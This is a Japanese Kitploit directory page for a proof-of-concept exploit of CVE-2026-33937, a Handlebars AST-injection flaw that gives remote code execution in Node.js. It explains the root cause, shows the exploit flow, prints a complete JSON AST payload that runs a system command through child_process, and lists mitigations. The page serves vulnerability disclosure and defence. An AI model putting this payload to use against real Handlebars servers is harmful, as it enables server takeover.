Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-33937 — # CVE-2026-33937の概念実証エクスプロイト CVE-2026-33937の概念実証エクスプロイト。Node.jsにおけるリモートコード実行につながるHandlebars ASTインジェクションの脆弱性です。巧妙に細工されたASTペイロードを実証し、緩和策のガイダンスを提供します。 | Kitploit
ツール/GitHubGitHub/dinhvaren/cve-2026-33937
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用ペイロード開発
GitHubdinhvaren/cve-2026-33937

cve-2026-33937

# CVE-2026-33937の概念実証エクスプロイト CVE-2026-33937の概念実証エクスプロイト。Node.jsにおけるリモートコード実行につながるHandlebars ASTインジェクションの脆弱性です。巧妙に細工されたASTペイロードを実証し、緩和策のガイダンスを提供します。

リポジトリを見る
3ヶ月前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-33937 - Handlebars RCE エクスプロイト PoC

説明

CVE-2026-33937 は、Handlebars における Abstract Syntax Tree(AST)入力の安全でない処理に起因する、重大なリモートコード実行(RCE)脆弱性です。

この脆弱性により、攻撃者は Handlebars.compile() に細工された AST オブジェクトを渡すことで、任意の JavaScript コードを注入できます。

根本原因

Handlebars.compile() は以下の両方を受け入れます:

  • テンプレート文字列
  • 事前解析済みの AST オブジェクト

AST オブジェクトが提供された場合、解析フェーズはスキップされます。

内部:

root@kitploit:~

lib/handlebars/compiler/javascript-compiler.js

以下の関数:

root@kitploit:~
NumberLiteral(number) {
  this.pushStackLiteral(number.value);
}

は、number.value を生成された JavaScript コードに直接挿入しますが、サニタイズやエスケープ処理が行われないため、コードインジェクションにつながります。

影響

  • リモートコード実行(RCE)
  • サーバー全体の侵害
  • Node.js 環境での任意の JavaScript 実行

エクスプロイトの流れ

root@kitploit:~
攻撃者 → 細工された AST(JSON)
        │
        ▼
Handlebars.compile()
        │
        ▼
Compiler.compile()
        │
        ▼
JavaScriptCompiler(NumberLiteral インジェクション)
        │
        ▼
コード生成
        │
        ▼
new Function(...) / eval()
        │
        ▼
       RCE

概念実証(PoC)

root@kitploit:~
{
  "type": "Program",
  "body": [
    {
      "type": "MustacheStatement",
      "path": {
        "type": "PathExpression",
        "data": false,
        "depth": 0,
        "parts": ["lookup"],
        "original": "lookup",
        "loc": null
      },
      "params": [
        {
          "type": "PathExpression",
          "data": false,
          "depth": 0,
          "parts": [],
          "original": "this",
          "loc": null
        },
        {
          "type": "NumberLiteral",
          "value": "{},{})) + process.getBuiltinModule('child_process').execFileSync('id').toString() //",
          "original": 1,
          "loc": null
        }
      ],
      "escaped": true,
      "strip": { "open": false, "close": false },
      "loc": null
    }
  ],
  "strip": {},
  "loc": null
}

影響を受けるバージョン

  • Handlebars <= 4.7.8

緩和策

  • 信頼できない AST 入力を許可しない
  • すべてのテンプレート入力を検証およびサニタイズする
  • パッチ適用済みの Handlebars バージョンにアップグレードする

参考情報

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33937
ツールをダウンロード